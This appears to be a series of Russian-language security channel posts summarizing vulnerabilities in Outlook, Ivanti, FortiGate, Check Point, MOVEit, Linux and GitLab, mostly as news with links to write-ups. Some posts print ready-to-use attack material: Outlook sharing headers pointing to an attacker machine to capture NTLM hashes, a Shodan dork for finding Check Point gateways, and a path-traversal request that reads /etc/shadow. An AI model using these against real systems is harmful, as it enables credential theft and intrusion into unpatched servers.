😂 CVE-2023-35636

Команда Varonis обнаружила новую багу в функции обмена календарями в Microsoft Outlook, при котором добавление двух заголовков в электронное письмо заставляет Outlook делиться контентом и связываться с указанной машиной, создавая возможность перехвата хэша NTLM v2.

К слову, это новый способ получения NTLM-хэшей среди двух других новых способов: с помощью Windows Performance Analyzer и проводника Windows.

Для тех, кто не знает, NTLM v2 — это криптографический протокол, используемый Windows для аутентификации пользователей на удаленных серверах. Хотя NTLM v2 является более безопасной версией оригинального NTLM, v2 все еще уязвим для атак методом брутфорса и не только.

📌 Те самые заголовки Outlook:

"Content-Class" = "Sharing"
"x-sharing-config-url" = \\(Attacker machine)\a.ics

#pentest #CVE

🤦‍♂️🔐 1 февраля этого года компания Ivanti объявила о закрытии серьезных уязвимостей в своих продуктах Ivanti Connect Secure и Ivanti Policy Secure. Эти уязвимости, обнаруженные в декабре 2023 года, уже активно эксплуатировались злоумышленниками, представляя значительную угрозу для VPN-серверов. Сложности с разработкой патча привели к тому, что CISA потребовало отключить уязвимые решения за день до выпуска обновлений. Это уже второй серьезный инцидент с продуктами Ivanti, предыдущий произошел в августе 2023 года.

Команда Volexity обнаружила две уязвимости (CVE-2023-46805 и CVE-2024-21887) в VPN-сервере, позволяющие обходить аутентификацию и выполнять произвольные команды. После публикации информации об уязвимостях количество атак значительно увеличилось. Ivanti предложила временные решения, но некоторые из них были обойдены атакующими. В конечном итоге, для полной защиты требовалась переустановка ПО с нуля и установка патча.

Естественно, команду Assetnote эти уязвимости заинтересовали. Их исследования, реверс прошивки и многое другое — под катом:

⚡️High Signal Detection and Exploitation of Ivanti's Pulse Connect Secure Auth Bypass RCE
⚡️Ivanti's Pulse Connect Secure Auth Bypass Round Two

#pentest #reverse #CVE

#research #CVE

🔎 Команда исследователей Assetnote представила очередной подробный ресёрч. На этот раз это pre-auth RCE в FortiGate SSLVPN (CVE-2024-21762).

🧰 Под катом вас ждет подробное описание каждого шага: от извлечения бинарей до создания работающего эксплойта👇

Все пишут про CVE-2024-24919, и мы напишем.

🔍 Дорк для Shodan: title:"Check Point" ssl:"target"

Эксплуатация👇

POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

#CVE

⚡️ Обход аутентификации в Progress MOVEit Transfer: исследование прошлогодней CVE-2023-34362

В этой записи блога есть все: и сложная уязвимость, и мастер-класс по созданию забавных цепочек эксплуатации.

👉 Читать

#writeup #pentest #CVE

🔍 Глубокое погружение в RCU Race Condition: анализ TCP-AO UAF (CVE-2024–27394)

Эта уязвимость для Linux use-after-free (UAF) была исправлена в апреле 2024 года, но подробное описание и PoC стали доступны только в этом посте. Статью в формате PDF скинули в комментарии.

#cve #pentest #writeup

🤯👩‍💻 GitLab патчит критическую уязвимость, связанную с пайплайном

Разработчики GitLab выпустили патчи для устранения нескольких уязвимостей, наиболее серьезная из которых (CVE-2024-6678) при определенных условиях позволяет злоумышленнику запускать пайплайны от имени любого пользователя.

Пайплайны GitLab являются частью системы CI/CD, которая позволяет пользователям автоматически запускать процессы и задачи параллельно или последовательно для сборки, тестирования или деплоя изменений в коде.

За последние месяцы GitLab уже не первый раз устраняет связанные с пайплайнами баги. Так, в июле 2024 года была устранена критическая проблема CVE-2024-6385, а в июне — CVE-2024-5655.

👉 Подробнее

#CVE #security